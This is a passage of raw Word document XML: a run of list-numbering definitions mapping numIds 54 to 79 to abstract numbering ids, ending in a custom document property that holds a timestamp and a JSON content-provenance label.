  <w:num w:numId="54">
    <w:abstractNumId w:val="2806812"/>
  </w:num>
  <w:num w:numId="55">
    <w:abstractNumId w:val="2806813"/>
  </w:num>
  <w:num w:numId="56">
    <w:abstractNumId w:val="2806814"/>
  </w:num>
  <w:num w:numId="57">
    <w:abstractNumId w:val="2806815"/>
  </w:num>
  <w:num w:numId="58">
    <w:abstractNumId w:val="2806816"/>
  </w:num>
  <w:num w:numId="59">
    <w:abstractNumId w:val="2806817"/>
  </w:num>
  <w:num w:numId="60">
    <w:abstractNumId w:val="2806818"/>
  </w:num>
  <w:num w:numId="61">
    <w:abstractNumId w:val="2806819"/>
  </w:num>
  <w:num w:numId="62">
    <w:abstractNumId w:val="2806820"/>
  </w:num>
  <w:num w:numId="63">
    <w:abstractNumId w:val="2806821"/>
  </w:num>
  <w:num w:numId="64">
    <w:abstractNumId w:val="2806822"/>
  </w:num>
  <w:num w:numId="65">
    <w:abstractNumId w:val="2806823"/>
  </w:num>
  <w:num w:numId="66">
    <w:abstractNumId w:val="2806824"/>
  </w:num>
  <w:num w:numId="67">
    <w:abstractNumId w:val="2806825"/>
  </w:num>
  <w:num w:numId="68">
    <w:abstractNumId w:val="2806826"/>
  </w:num>
  <w:num w:numId="69">
    <w:abstractNumId w:val="2806827"/>
  </w:num>
  <w:num w:numId="70">
    <w:abstractNumId w:val="2806828"/>
  </w:num>
  <w:num w:numId="71">
    <w:abstractNumId w:val="2806829"/>
  </w:num>
  <w:num w:numId="72">
    <w:abstractNumId w:val="2806830"/>
  </w:num>
  <w:num w:numId="73">
    <w:abstractNumId w:val="2806831"/>
  </w:num>
  <w:num w:numId="74">
    <w:abstractNumId w:val="2806832"/>
  </w:num>
  <w:num w:numId="75">
    <w:abstractNumId w:val="2806833"/>
  </w:num>
  <w:num w:numId="76">
    <w:abstractNumId w:val="2806834"/>
  </w:num>
  <w:num w:numId="77">
    <w:abstractNumId w:val="2806835"/>
  </w:num>
  <w:num w:numId="78">
    <w:abstractNumId w:val="2806836"/>
  </w:num>
  <w:num w:numId="79">
    <w:abstractNumId w:val="28068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2026-06-24T08:49:26Z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{"Label":"1","ContentProducer":"001191110102MACQD9K64010000","ProduceID":"7654881399065496508","ReservedCode1":"","ContentPropagator":"","PropagateID":"","ReservedCode2":""}</vt:lpwstr>
  </property>
</Properties>
</file>